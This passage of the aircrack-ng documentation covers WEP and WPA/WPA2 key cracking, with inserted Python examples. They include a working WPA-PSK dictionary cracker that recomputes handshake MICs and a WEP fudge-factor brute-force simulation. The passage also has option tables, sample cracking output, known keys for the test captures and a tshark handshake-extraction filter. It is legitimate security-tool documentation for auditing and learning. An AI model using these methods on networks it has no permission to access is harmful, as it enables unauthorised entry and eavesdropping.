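    version 2) uses HMAC-SHA1 truncated to 16 bytes; WPA/TKIP (version 1) uses HMAC-MD5."""
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * MIC_LEN + eapol[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.sha1 if wpa2 else hashlib.md5
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_eapol_msg2(snonce, mic=b"\x00" * MIC_LEN):
    """Constructed EAPOL-Key message 2 of 4 (RSN descriptor; key info: pairwise + MIC, version 2)."""
    body = (bytes([2])                                   # descriptor type: RSN
            + struct.pack(">HH", 0x010A, 16)             # key info, key length (CCMP)
            + (1).to_bytes(8, "big")                     # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, RSC, ID
            + mic + struct.pack(">H", 0))                # MIC, key data length
    return bytes([2, 3]) + struct.pack(">H", len(body)) + body   # EAPOL version 2, type EAPOL-Key


def crack_psk(ssid, ap_mac, sta_mac, anonce, snonce, eapol_msg2, wordlist, wpa2=True):
    """What aircrack-ng -a 2 does per word: recompute the MIC and compare it with the captured one."""
    captured_mic = eapol_msg2[MIC_OFFSET:MIC_OFFSET + MIC_LEN]
    for word in wordlist:
        if not 8 <= len(word) <= 63:          # WPA passphrases are 8 to 63 characters; skip the rest
            continue
        kck = derive_kck(pmk_from_passphrase(word, ssid), ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(kck, eapol_msg2, wpa2), captured_mic):
            return word
    return None


def example_handshake(passphrase="correct horse battery", ssid="Practice"):
    """Constructed capture: what airodump-ng would have recorded, with a MIC made from the passphrase."""
    ap_mac, sta_mac = bytes.fromhex("000102030405"), bytes.fromhex("000405060708")
    anonce = bytes(range(32))                              # from message 1 (or 3)
    snonce = bytes(range(32, 64))                          # from message 2
    kck = derive_kck(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    msg2 = build_eapol_msg2(snonce, mic=eapol_mic(kck, build_eapol_msg2(snonce)))
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol_msg2": msg2}


if __name__ == "__main__":
    hs = example_handshake()
    words = ["password", "12345678", "short", "correct horse battery", "letmein1"]
    print(crack_psk(hs["ssid"], hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"],
                    hs["eapol_msg2"], words))
```

The 4096-iteration PBKDF2 in pmk_from_passphrase is the cost that the SIMD code paths and airolib-ng's precomputed PMK tables exist to amortize; everything after it is a handful of HMACs per word.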
Explanation of the Depth Field and Fudge Factor

The best explanation is an example. We will look at a specific byte. All bytes are processed in the same manner.

You have the votes like in the screen shot above. For the first byte they look like: AE(50) 11(20) 71(20) 10(12) 84(12)

The AE, 11, 71, 10 and 84 are the possible secret key for key byte 0. The numbers in parentheses are the votes each possible secret key has accumulated so far.

Now if you decide to use a fudge factor of 3. Aircrack-ng takes the vote from the most possible byte AE(50):

50 / 3 = 16.666666

Aircrack-ng will test (brute force) all possible keys with a vote greater than 16.6666, resulting in

AE, 11, 71

being tested, so we have a total depth of three:

0 / 3 AE(50) 11(20) 71(20) 10(12) 84(12)

When aircrack-ng is testing keys with AE, it shows 0 / 3, if it has all keys tested with that byte, it switches to the next one (11 in this case) and displays:

1 / 3 11(20) 71(20) 10(12) 84(12)
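The fudge-factor rule and the depth display just described, as an added Python example (not aircrack-ng's own code). It uses the page's vote line for key byte 0 plus constructed vote lines for four more key bytes of a 40-bit key and a constructed "true" key, to show which candidates survive a given fudge factor, how fast the search space grows with it, and why too small a fudge factor makes the search fail outright. The is_correct callback stands in for aircrack-ng's real check, which decrypts a captured packet with the candidate key and verifies its ICV.

```python
"""Fudge factor, depth and brute-force search space (added example; constructed votes)."""
from itertools import product

# Votes per key byte as aircrack-ng shows them: (candidate byte, votes), best first.
# Key byte 0 is the page's example; bytes 1 to 4 are constructed to complete a 40-bit key.
EXAMPLE_VOTES = [
    [(0xAE, 50), (0x11, 20), (0x71, 20), (0x10, 12), (0x84, 12)],
    [(0x5B, 44), (0x3C, 30), (0x02, 9)],
    [(0x7F, 61), (0x7E, 14), (0x00, 13)],
    [(0xC3, 36), (0xC4, 35), (0x19, 8)],
    [(0x0D, 29), (0x9A, 28), (0x9B, 27), (0x01, 5)],
]
# Constructed "real" key: the statistics got bytes 1, 3 and 4 wrong, which brute force must fix.
EXAMPLE_KEY = bytes([0xAE, 0x3C, 0x7F, 0xC4, 0x9B])


def candidates(votes, fudge):
    """Candidates for one key byte: every value with at least best_votes / fudge votes."""
    threshold = votes[0][1] / fudge
    return [value for value, n in votes if n >= threshold]


def depth(votes, fudge):
    return len(candidates(votes, fudge))


def status_line(votes, fudge, current):
    """The 'depth / total' column aircrack-ng prints for one key byte, then the remaining votes."""
    shown = votes[current:]
    return f"{current} / {depth(votes, fudge)} " + " ".join(f"{v:02X}({n})" for v, n in shown)


def search_space(all_votes, fudge):
    """Number of full keys the brute-force phase may have to try: the product of the depths."""
    total = 1
    for votes in all_votes:
        total *= depth(votes, fudge)
    return total


def brute_force(all_votes, fudge, is_correct):
    """Try candidate keys with the first key byte varying slowest, matching the depth display.
    is_correct(key) stands in for decrypting a captured packet and checking its ICV."""
    tries = 0
    for key in product(*(candidates(votes, fudge) for votes in all_votes)):
        tries += 1
        if is_correct(bytes(key)):
            return bytes(key), tries
    return None, tries


if __name__ == "__main__":
    for fudge in (1, 2, 3, 5):
        found, tries = brute_force(EXAMPLE_VOTES, fudge, lambda k: k == EXAMPLE_KEY)
        print(f"fudge {fudge}: search space {search_space(EXAMPLE_VOTES, fudge):4d}, "
              f"key {'found' if found else 'not found'} after {tries} tries")
    print(status_line(EXAMPLE_VOTES[0], 3, 1))
```

With these votes a fudge factor of 1 tests exactly one key and fails, 2 finds the key on the twelfth of twelve tries, and 5 balloons the space to 405 keys; for a 104-bit key the product runs over 13 bytes, which is why the page warns that the search time grows tremendously.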
Usage

aircrack-ng [options] <capture file(s)>

You can specify multiple input files (either in .cap or .ivs format) or use file name wildcarding. See Other Tips for examples. Also, you can run both airodump-ng and aircrack-ng at the same time: aircrack-ng will auto-update when new IVs are available.
Options
Common options
Option	Param.	Description
-a	amode	Force attack mode (1 = static WEP, 2 = WPA/WPA2-PSK)
-e	essid	If set, all IVs from networks with the same ESSID will be used. This option is also required for WPA/WPA2-PSK cracking if the ESSID is not broadcasted (hidden)
-b	bssid	Long version --bssid. Select the target network based on the access point's MAC address
-p	nbcpu	On SMP systems: # of CPU to use. This option is invalid on non-SMP systems
-q	none	Enable quiet mode (no status output until the key is found, or not)
-C	MACs	Long version --combine. Merge the given APs (separated by a comma) into virtual one
-l	file name	(Lowercase L, ell) logs the key to the file specified. Overwrites the file if it already exists
Static WEP cracking options
Option	Param.	Description
-c	none	Restrict the search space to alpha-numeric characters only (0x20 - 0x7F)
-t	none	Restrict the search space to binary coded decimal hex characters
-h	none	Restrict the search space to numeric characters (0x30-0x39) These keys are used by default in most Fritz!BOXes
-d	start	Long version --debug. Set the beginning of the WEP key (in hex), for debugging purposes
-m	maddr	MAC address to filter WEP data packets. Alternatively, specify -m ff:ff:ff:ff:ff:ff to use all and every IVs, regardless of the network
-n	nbits	Specify the length of the key: 64 for 40-bit WEP, 128 for 104-bit WEP, etc. The default value is 128
-i	index	Only keep the IVs that have this key index (1 to 4). The default behaviour is to ignore the key index
-f	fudge	By default, this parameter is set to 2 for 104-bit WEP and to 5 for 40-bit WEP. Specify a higher value to increase the bruteforce level: cracking will take more time, but with a higher likelihood of success
-k	korek	There are 17 KoreK statistical attacks. Sometimes one attack creates a huge false positive that prevents the key from being found, even with lots of IVs. Try -k 1, -k 2, ... -k 17 to disable each attack selectively
-x/-x0	none	Disable last keybytes bruteforce
-x1	none	Enable last keybyte bruteforcing (default)
-x2	none	Enable last two keybytes bruteforcing
-X	none	Disable bruteforce multithreading (SMP only)
-s	none	Show the key in ASCII while cracking
-y	none	Experimental single bruteforce attack which should only be used when the standard attack mode fails with more than one million IVs
-z	none	Invokes the PTW WEP cracking method (Default in v1.x)
-P	number	Long version --ptw-debug. Invokes the PTW debug mode: 1 Disable klein, 2 PTW.
-K	none	Invokes the Korek WEP cracking method. (Default in v0.x)
-D	none	Long version --wep-decloak. Run in WEP decloak mode
-1	none	Long version --oneshot. Run only 1 try to crack key with PTW
-M	number	(WEP cracking) Specify the maximum number of IVs to use
-V	none	Long version --visual-inspection. Run in visual inspection mode (only with KoreK)
WEP and WPA-PSK cracking options
Option	Param.	Description
-w	words	Path to a wordlist, or - (without the quotes) to read candidates from standard input (stdin). Separate multiple wordlists with commas
-N	file	Create a new cracking session and save it to the specified file
-R	file	Restore cracking session from the specified file
WPA-PSK options
Option	Param.	Description
-E	file	Create EWSA Project file v3
-j	file	Create Hashcat v3.6+ Capture file (HCCAPX)
-J	file	Create Hashcat Capture file
-S	none	WPA cracking speed test
-Z	sec	WPA cracking speed test execution length in seconds
-r	database	Utilizes a database generated by airolib-ng as input to determine the WPA key. Outputs an error message if aircrack-ng has not been compiled with sqlite support
SIMD Selection
Option	Param.	Description
--simd	optimization	Use user-specified SIMD optimization instead of the fastest one
--simd-list	none	Shows a list of the SIMD optimizations available
Other options
Option	Param.	Description
-H	none	Long version --help. Output help information
-u	none	Long form --cpu-detect. Provide information on the number of CPUs and features available such as MMX, SSE2, AVX, AVX2, AVX512
Usage Examples
WEP

The simplest case is to crack a WEP key. If you want to try this out yourself, here is a test file. The key to the test file matches the screen image above; it does not match the following example.

aircrack-ng -K 128bit.ivs
Where:

    128bit.ivs is the file name containing IVS.
    -K: Use KoreK attacks only

The program responds:

 Opening 128bit.ivs
 Read 684002 packets.

 #  BSSID              ESSID                     Encryption

 1  00:14:6C:04:57:9B                            WEP (684002 IVs)

 Choosing first network as target.

If there were multiple networks contained in the file then you are given the option to select which one you want. By default, aircrack-ng assumes 128 bit encryption.

The cracking process starts and once cracked, here is what it looks like:

                                              Aircrack-ng 1.4


                              [00:00:10] Tested 77 keys (got 684002 IVs)

 KB    depth   byte(vote)
  0    0/  1   AE( 199) 29(  27) 2D(  13) 7C(  12) FE(  12) FF(   6) 39(   5) 2C(   3) 00(   0) 08(   0) 
  1    0/  3   66(  41) F1(  33) 4C(  23) 00(  19) 9F(  19) C7(  18) 64(   9) 7A(   9) 7B(   9) F6(   9) 
  2    0/  2   5C(  89) 52(  60) E3(  22) 10(  20) F3(  18) 8B(  15) 8E(  15) 14(  13) D2(  11) 47(  10) 
  3    0/  1   FD( 375) 81(  40) 1D(  26) 99(  26) D2(  23) 33(  20) 2C(  19) 05(  17) 0B(  17) 35(  17) 
  4    0/  2   24( 130) 87( 110) 7B(  32) 4F(  25) D7(  20) F4(  18) 17(  15) 8A(  15) CE(  15) E1(  15) 
  5    0/  1   E3( 222) 4F(  46) 40(  45) 7F(  28) DB(  27) E0(  27) 5B(  25) 71(  25) 8A(  25) 65(  23) 
  6    0/  1   92( 208) 63(  58) 54(  51) 64(  35) 51(  26) 53(  25) 75(  20) 0E(  18) 7D(  18) D9(  18) 
  7    0/  1   A9( 220) B8(  51) 4B(  41) 1B(  39) 3B(  23) 9B(  23) FA(  23) 63(  22) 2D(  19) 1A(  17) 
  8    0/  1   14(1106) C1( 118) 04(  41) 13(  30) 43(  28) 99(  25) 79(  20) B1(  17) 86(  15) 97(  15) 
  9    0/  1   39( 540) 08(  95) E4(  87) E2(  79) E5(  59) 0A(  44) CC(  35) 02(  32) C7(  31) 6C(  30) 
 10    0/  1   D4( 372) 9E(  68) A0(  64) 9F(  55) DB(  51) 38(  40) 9D(  40) 52(  39) A1(  38) 54(  36) 
 11    0/  1   27( 334) BC(  58) F1(  44) BE(  42) 79(  39) 3B(  37) E1(  34) E2(  34) 31(  33) BF(  33) 

           KEY FOUND! [ AE:66:5C:FD:24:E3:92:A9:14:39:D4:27:4B ] 

NOTE: The ASCII WEP key is displayed only when 100% of the hex key can be converted to ASCII.

This key can then be used to connect to the network.

Next, we look at cracking WEP with a dictionary. In order to do this, we need dictionary files with ascii or hexadecimal keys to try. Remember, a single file can only have ascii or hexadecimal keys in it, not both.

WEP keys can be entered in hexadecimal or ASCII. The following table describes how many characters of each type are required in your files.

WEP key length in bits	Hexadecimal characters	ASCII characters
64	10	5
128	26	13
152	32	16
256	58	29

Example 64 bit ascii key: ABCDE
Example 64 bit hexadecimal key: 12:34:56:78:90 (Note the : between each two characters.)
Example 128 bit ascii key: ABCDEABCDEABC
Example 128 bit hexadecimal key: 12:34:56:78:90:12:34:56:78:90:12:34:56
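
As an added example (not part of aircrack-ng), the following Python script applies the table above to a candidate list: it sorts each line into the hex or the ASCII file that -w h:hex.txt,ascii.txt expects for the chosen -n, rejects lines of the wrong length (a frequent cause of an instant "key not found"), and also shows the rule under which a found hex key can be displayed as ASCII. Writing hex keys without ':' separators is an assumption of this example, not a documented requirement, and the candidate lines it ships with are constructed.

```python
import re
import sys
from pathlib import Path

# (hex characters, ASCII characters) per WEP key length, from the table above.
WEP_KEY_CHARS = {64: (10, 5), 128: (26, 13), 152: (32, 16), 256: (58, 29)}
HEX_RE = re.compile(r"^[0-9A-Fa-f]+$")

# Constructed candidate lines (not a real wordlist): two spellings of the same hex key,
# one ASCII key and two lines that fit neither length for -n 64.
SAMPLE_CANDIDATES = ["ABCDE", "12:34:56:78:90", "1234567890", "toolong", "deadbeefCAFE", ""]


def strip_separators(candidate: str) -> str:
    """Make 12:34:56:78:90 and 1234567890 compare equal."""
    return candidate.replace(":", "").replace("-", "")


def classify(candidate: str, nbits: int):
    """Return 'hex', 'ascii' or None when the line cannot be a key of -n nbits.

    The hex length is always twice the ASCII length, so a line is never valid as both.
    """
    hex_len, ascii_len = WEP_KEY_CHARS[nbits]
    stripped = strip_separators(candidate)
    if HEX_RE.match(stripped) and len(stripped) == hex_len:
        return "hex"
    if len(candidate) == ascii_len:
        return "ascii"
    return None


def split_wordlist(lines, nbits: int):
    """Partition candidates into the hex and ASCII lists for -w h:hex.txt,ascii.txt."""
    hex_keys, ascii_keys, rejected = [], [], []
    for raw in lines:
        cand = raw.rstrip("\r\n")
        if not cand:
            continue
        kind = classify(cand, nbits)
        if kind == "hex":
            # Separators stripped and upper-cased: an assumption of this example.
            hex_keys.append(strip_separators(cand).upper())
        elif kind == "ascii":
            ascii_keys.append(cand)
        else:
            rejected.append(cand)
    return hex_keys, ascii_keys, rejected


def hex_key_to_ascii(hexkey: str):
    """ASCII form of a KEY FOUND value, or None when any byte is outside printable
    ASCII (0x20-0x7E here); aircrack-ng only shows the ASCII key when every byte converts."""
    raw = bytes.fromhex(strip_separators(hexkey))
    return raw.decode("ascii") if all(0x20 <= b < 0x7F for b in raw) else None


def write_split(lines, nbits, hex_path="hex.txt", ascii_path="ascii.txt"):
    """Write the two files and return (hex count, ASCII count, rejected lines)."""
    hex_keys, ascii_keys, rejected = split_wordlist(lines, nbits)
    Path(hex_path).write_text("\n".join(hex_keys) + "\n")
    Path(ascii_path).write_text("\n".join(ascii_keys) + "\n")
    return len(hex_keys), len(ascii_keys), rejected


if __name__ == "__main__":
    # usage: python wepdict.py [wordlist] [64|128|152|256]; defaults to the constructed sample
    lines = open(sys.argv[1]) if len(sys.argv) > 1 else SAMPLE_CANDIDATES
    nbits = int(sys.argv[2]) if len(sys.argv) > 2 else 64
    nh, na, bad = write_split(lines, nbits)
    print(f"{nh} hex and {na} ASCII candidates written; rejected: {bad}")
```

Run it against your own list with the key length you intend to pass as -n; anything reported as rejected will never match, however good the guess, because aircrack-ng compares keys of exactly that length.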

To WEP dictionary crack a 64 bit key:

aircrack-ng -w h:hex.txt,ascii.txt -a 1 -n 64 -e teddy wep10-01.cap

Where:

    -w h:hex.txt,ascii.txt is the list of files to use. For files containing hexadecimal values, you must put a h: in front of the file name.
    -a 1 says that it is WEP
    -n 64 says it is 64 bits. Change this to the key length that matches your dictionary files.
    -e teddy optionally selects the access point. You could also use the -b option to select it by MAC address
    wep10-01.cap is the name of the file containing the data. It can be a full packet capture or an IVs-only file. It must contain a minimum of four IVs.

Here is a sample of the output:

                                              Aircrack-ng 1.4
 
 
                              [00:00:00] Tested 2 keys (got 13 IVs)
 
 KB    depth   byte(vote)
  0    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  1    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  2    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  3    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
  4    0/  0   00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 00(   0) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Probability: 100%

Let's look at a PTW attack example. Remember that this method requires ARP request/reply packets as input. It must be the full packet and not just the IVs, meaning that the --ivs option cannot be used when running airodump-ng. As well, it only works for 64 and 128 bit WEP encryption.

Enter the following command:

 aircrack-ng -z ptw*.cap  

Where:

    -z means use the PTW methodology to crack the wep key. Note: in v1.x, this is the default attack mode; use -K to revert to Korek.
    ptw*.cap are the capture files to use.

The system responds:

 Opening ptw-01.cap
 Read 171721 packets.
    
 #  BSSID              ESSID                     Encryption
 
 1  00:14:6C:7E:40:80  teddy                     WEP (30680 IVs)
 
 Choosing first network as target.

Then:

                                              Aircrack-ng 1.4
 
                              [00:01:18] Tested 0/140000 keys (got 30680 IVs)
 
 KB    depth   byte(vote)
  0    0/  1   12( 170) 35( 152) AA( 146) 17( 145) 86( 143) F0( 143) AE( 142) C5( 142) D4( 142) 50( 140) 
  1    0/  1   34( 163) BB( 160) CF( 147) 59( 146) 39( 143) 47( 142) 42( 139) 3D( 137) 7F( 137) 18( 136) 
  2    0/  1   56( 162) E9( 147) 1E( 146) 32( 146) 6E( 145) 79( 143) E7( 142) EB( 142) 75( 141) 31( 140) 
  3    0/  1   78( 158) 13( 156) 01( 152) 5F( 151) 28( 149) 59( 145) FC( 145) 7E( 143) 76( 142) 92( 142) 
  4    0/  1   90( 183) 8B( 156) D7( 148) E0( 146) 18( 145) 33( 145) 96( 144) 2B( 143) 88( 143) 41( 141) 
 
                       KEY FOUND! [ 12:34:56:78:90 ] 
      Decrypted correctly: 100%

WPA

Now onto cracking WPA/WPA2 passphrases. Aircrack-ng can crack either type.

aircrack-ng -w password.lst *.cap
Where:

    -w password.lst is the name of the password file. Remember to specify the full path if the file is not located in the same directory.
    *.cap is name of group of files containing the captured packets. Notice in this case that we used the wildcard * to include multiple files.

The program responds:

 Opening wpa2.eapol.cap
 Opening wpa.cap
 Read 18 packets.

 #  BSSID              ESSID                     Encryption

 1  00:14:6C:7E:40:80  Harkonen                  WPA (1 handshake)
 2  00:0D:93:EB:B0:8C  test                      WPA (1 handshake)

 Index number of target network ? 

Notice in this case that since there are multiple networks we need to select which one to attack. We select number 2. The program then responds:

                               Aircrack-ng 1.4


                 [00:00:03] 230 keys tested (73.41 k/s)


                         KEY FOUND! [ biscotte ]


    Master Key     : CD D7 9A 5A CF B0 70 C7 E9 D1 02 3B 87 02 85 D6 
                     39 E4 30 B3 2F 31 AA 37 AC 82 5A 55 B5 55 24 EE 

    Transcient Key : 33 55 0B FC 4F 24 84 F4 9A 38 B3 D0 89 83 D2 49 
                     73 F9 DE 89 67 A6 6D 2B 8E 46 2C 07 47 6A CE 08 
                     AD FB 65 D6 13 A9 9F 2C 65 E4 A6 08 F2 5A 67 97 
                     D9 6F 76 5B 8C D3 DF 13 2F BC DA 6A 6E D9 62 CD 

    EAPOL HMAC     : 52 27 B8 3F 73 7C 45 A0 05 97 69 5C 30 78 60 BD 

Now you have the passphrase and can connect to the network.
SIMD

Aircrack-ng is compiled with multiple optimizations based on CPU features we call crypto engines. CPU features are different based on the type of CPU.

On x86 (and 64 bit), typically SSE2, AVX and AVX2 are available (AVX512 can be compiled in but it should only be done if the current CPU supports it). On ARM, neon and ASIMD are usually available and on PowerPC, ASIMD and altivec. A generic optimization is always available no matter what architecture it is compiled on or for. A limited set of optimizations may be available depending on the OS/CPU/compilers available.

When aircrack-ng runs, it loads the fastest optimization that the CPU it is running on supports. This is convenient for package maintainers: they do not have to build for the lowest common denominator CPU, which would also be the slowest.

To override the automatic choice, use the --simd option, for example:

aircrack-ng --simd=avx wpa.cap -w password.lst

To list the SIMD optimizations available in your build, use --simd-list:

aircrack-ng --simd-list

will display avx2 avx sse2 generic on x86.
Cracking session

Cracking can take a very long time, and it is sometimes necessary to turn the computer off or put it to sleep. To handle this, a set of session options was added.

They create and/or update a session file that records the current state of the crack (every 10 minutes) together with the options, wordlists and capture files that were used. Multiple wordlists can be used, and sessions work for both WEP and WPA.

aircrack-ng --new-session current.session -w password.lst,english.txt wpa-01.cap 

In order to restore the session, use --restore-session:

aircrack-ng --restore-session current.session

It will keep updating current.session every 10 minutes.

Limitations:

    The wordlists must be regular files. For now, they cannot be stdin or airolib-ng databases
    Session has to be restored from the same directory as when first using --new-session
    No new options can be added when restoring session

Usage Tips
General approach to cracking WEP keys

FIXME This needs updating for v1.x!

Clearly, the simplest approach is just to enter aircrack-ng captured-data.cap and let it go. Having said that, there are some techniques to improve your chances of finding the WEP key quickly. There is no single magic set of steps. The following describes some approaches which tend to yield the key faster. Unless you are comfortable with experimentation, leave well enough alone and stick to the simple approach.

If you are capturing arp request/reply packets, then the fastest approach is to use aircrack-ng -z <data packet capture files>. You can then skip the balance of this section since it will find the key very quickly assuming you have collected sufficient arp request/reply packets! NOTE: -z is the default attack mode in aircrack-ng v1.x; use -K to revert to the attack mode used in previous versions.

The overriding technique is to capture as much data as possible. That is the single most important task. The number of initialization vectors (IVs) needed to determine the WEP key varies dramatically by key length and access point. Typically you need 250,000 or more unique IVs for 64 bit keys and 1.5 million or more for 128 bit keys, and clearly a lot more for longer key lengths. Then there is luck. There will be times when the WEP key can be determined with as few as 50,000 IVs, although this is rare. Conversely, there will be times when you need multiple millions of IVs to crack the WEP key. The number of IVs is extremely hard to predict, since some access points are very good at avoiding the weak IVs that leak the WEP key.

Generally, don't try to crack the WEP key until you have 200,000 IVs or more. If you start too early, aircrack tends to spend too much time brute forcing keys and not properly applying the statistical techniques. Start by trying 64 bit keys: aircrack-ng -n 64 captured-data.cap. If they are using 64 bit WEP, it can usually be cracked in less than 5 minutes (generally less than 60 seconds) with relatively few IVs. It is surprising how many APs only use 64 bit keys. If it does not find the 64 bit key in 5 minutes, restart aircrack in the generic mode: aircrack-ng captured-data.cap. Then at each 100,000 IVs mark, retry aircrack-ng -n 64 captured-data.cap for 5 minutes.

Once you hit 600,000 IVs, switch to testing 128 bit keys. At this point it is unlikely (but not impossible) that it is a 64 bit key and 600,000 IVs did not crack it. So now try aircrack-ng captured-data.cap.

Once you hit 2 million IVs, try changing the fudge factor to -f 4. Run for at least 30 minutes to one hour. Retry, increasing the fudge factor by adding 4 to it each time. Another time to try increasing the fudge factor is when aircrack-ng stops because it has tried all the keys.

All the while, keep collecting data. Remember the golden rule, the more IVs the better.

Also check out the next section on how to determine which options to use as these can significantly speed up cracking the WEP key. For example, if the key is all numeric, then it can take as few as 50,000 IVs to crack a 64 bit key with the -t versus 200,000 IVs without the -t. So if you have a hunch about the nature of the WEP key, it is worth trying a few variations.
How to determine which options to use

While aircrack-ng is running, you mostly just see the beginning of the key. Although the secret WEP key is unknown at this point, there may be clues to speed things up. If the key bytes have a fairly large number of votes, then they are likely 99.5% correct. So lets look at what you can do with these clues.

If the bytes (likely secret keys) are for example: 75:47:99:22:50 then it is quite obvious, that the whole key may consist only of numbers, like the first 5 bytes. So it MAY improve your cracking speed to use the -t option only when trying such keys. See Wikipedia Binary Coded Decimal for a description of what characters -t looks for.

If the bytes are 37:30:31:33:36 which are all numeric values when converted to Ascii, it is a good idea to use -h option. The FAQ entry Converting hex characters to ascii provides links to determine if they are all numeric.

And if the first few bytes are something like 74:6F:70:73:65, and upon entering them into your hexeditor or the links provided in the previous sentence, you see that they may form the beginning of some word, then it seems likely an ASCII key is used, thus you activate -c option to check only printable ASCII keys.

If you know the start of the WEP key in hexadecimal, you can enter with the -d parameter. Lets assume you know the WEP key is 0123456789 in hexadecimal then you could use -d 01 or -d 0123, etc.

Another option to try when having problems determining the WEP key, is the -x2 option which causes the last two keybytes to be brute forced instead of the default of one.
How to convert the HEX WEP key to ASCII?

See the next entry.
How to use the key

If aircrack-ng determines the key, it is presented to you in hexadecimal format. It typically looks like:

 KEY FOUND! [11:22:33:44:55]

The length will vary based on the WEP key length used. See the table above, which indicates the number of hexadecimal characters for the various WEP key bit lengths.

You may use this key without the : in your favorite client. This means you enter 1122334455 into the client and specify that the key is in hexadecimal format. Remember that most keys cannot be converted to ASCII format. If the HEX key is in fact valid ASCII characters, the ASCII will also be displayed.

If you wish to experiment a bit with converting HEX to ASCII, see this FAQ entry.

We do not specifically provide support or the details on how to configure your wireless card to connect to the AP. For linux, this page has an excellent writeup. As well, search the internet for this information regarding linux and Windows systems. As well, see the documentation for your card's wireless client. If you are using linux, check the mailing lists and forums specific to the distribution.

Additionally, Aircrack-ng prints out a message indicating the likelihood that the key is correct. It will look something similar to Probability: 100%. Aircrack-ng tests the key against some packets to confirm the key is correct. Based on these tests, it prints the probability of a correct key.

Also remember we do not support or endorse people accessing networks which do not belong to them.
How to convert the hex key back to the passphrase?

People quite often ask if the hexadecimal key found by aircrack-ng can be converted backwards to the original passphrase. The simple answer is NO.

To understand why this is so, let's take a look at how these passphrases are converted into the hexadecimal keys used in WEP.

Some vendors have a wep key generator which translates a passphrase into a hexadecimal WEP key. There are no standards for this. Very often they just pad short phrases with blanks, zeroes or other characters. However, usually the passphrases are filled with zeros up to the length of 16 bytes, and afterwards the MD5SUM of this bytestream will be the WEP Key. Remember, every vendor can do this in a slightly different way, and so they may not be compatible.

So there is no way to know how long the original passphrase was. It could be as short as one character. It all depends on who developed the software.

Knowing all this, if you still wish to try to obtain the original passphrase, Latin SuD has a tool which attempts to reverse the process.

Nonetheless, these passphrases result in a WEP Key that is as easily cracked as every other WEP Key. The exact conversion method really does not matter in the end.

Keep in mind that WEP passwords that look like plain text may be either ASCII keys or passphrases. Most (if not all) systems support ASCII keys, which are the default; some also support passphrases, and those that do require the user to say which of the two is being entered. Passphrases can be of arbitrary length, while ASCII keys are limited to 5 or 13 characters (WEP40 and WEP104).

As a side note, Windows WZC only supports fixed length hex or ascii keys, so the shortest inputable key is 5 characters long. See the table above on this page regarding how many characters are needed for specific key lengths.
Sample files to try

There are a number of sample files that you can try with aircrack-ng to gain experience:

    wpa.cap: This is a sample file with a wpa handshake. It is located in the test directory of the install files. The passphrase is biscotte. Use the password file (password.lst) which is in the same directory.
    wpa2.eapol.cap: This is a sample file with a wpa2 handshake. It is located in the test directory of the install files. The passphrase is 12345678. Use the password file (password.lst) which is in the same directory.
    test.ivs: This is a 128 bit WEP key file. The key is AE:5B:7F:3A:03:D0:AF:9B:F6:8D:A5:E2:C7.
    ptw.cap: This is a 64 bit WEP key file suitable for the PTW method. The key is 1F:1F:1F:1F:1F.
    wpa-psk-linksys.cap: This is a sample file with a WPA1 handshake along with some encrypted packets. Useful for testing with airdecap-ng. The password is dictionary.
    wpa2-psk-linksys.cap: This is a sample file with a WPA2 handshake along with some encrypted packets. Useful for testing with airdecap-ng. The password is dictionary.

Dictionary Format

Dictionaries used for WPA/WPA2 bruteforcing need to contain one passphrase per line.

The linux and Windows end of line formats differ slightly. See this Wikipedia entry for details. Conversion tools are available under both linux and Windows to convert one format to the other, and editors exist on both operating systems that handle both formats correctly. It is up to the reader to use an Internet search engine to find the appropriate tools.

However both types should work with the linux or Windows versions of aircrack-ng. Thus, you really don't need to convert back and forth.
Hexadecimal Key Dictionary

Although it is not part of aircrack-ng, an interesting piece of work by SuD is worth mentioning. It is a ready-made WEP hex dictionary together with the program to run it:

 https://www.latinsud.com/pub/wepdict/

Tools to split capture files

There are times when you want to split capture files into smaller pieces. For example, files with a large number of IVs can sometimes cause the PTW attack to fail. In this case, it is worth splitting the file into smaller pieces and retrying the PTW attack.

So here are two tools to split capture files:

    https://www.badpenguin.co.uk/files/pcap-util
    https://www.badpenguin.co.uk/files/pcap-util2

Another technique is to use Wireshark / tshark. You can mark packets and then save them to a separate file.
How to extract WPA handshake from large capture files

Sometimes you have a very large capture file and would like to extract the WPA/WPA2 handshake packets from it into a separate file. This can be done with tshark, the command line version of the Wireshark suite. Installing the linux version of the Wireshark suite on your system should also install tshark.

The following command will extract all handshake (EAPOL) and beacon packets from your pcap capture file and create a separate file with just those packets:

 tshark -r <input file name> -R "eapol || wlan.fc.type_subtype == 0x08" -w <output file name>

On current tshark releases -R is a two-pass read filter and must be combined with -2; the single-pass equivalent is -Y "eapol || wlan.fc.type_subtype == 0x08". The beacons are kept because they carry the ESSID that aircrack-ng needs alongside the handshake.

Remember you must use a pcap file as input, not an IVs file.
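
Here is an added example (not part of the aircrack-ng project) in pure Python that applies the same selection as the tshark filter above to a classic pcap file: it keeps beacons (management type 0, subtype 8) and unencrypted data frames whose LLC/SNAP header carries the EAPOL ethertype 0x888E, and writes them to a new pcap. It assumes the capture uses link type 105 (raw IEEE 802.11 frames without a radiotap header; check yours with capinfos) and does not handle pcapng. The four frames in the sample are constructed, not captured.

```python
import struct
import sys

LINKTYPE_IEEE802_11 = 105                     # raw 802.11 frames, no radiotap header
LLC_SNAP_EAPOL = b"\xaa\xaa\x03\x00\x00\x00\x88\x8e"   # LLC/SNAP + ethertype 0x888E


def read_pcap(blob: bytes):
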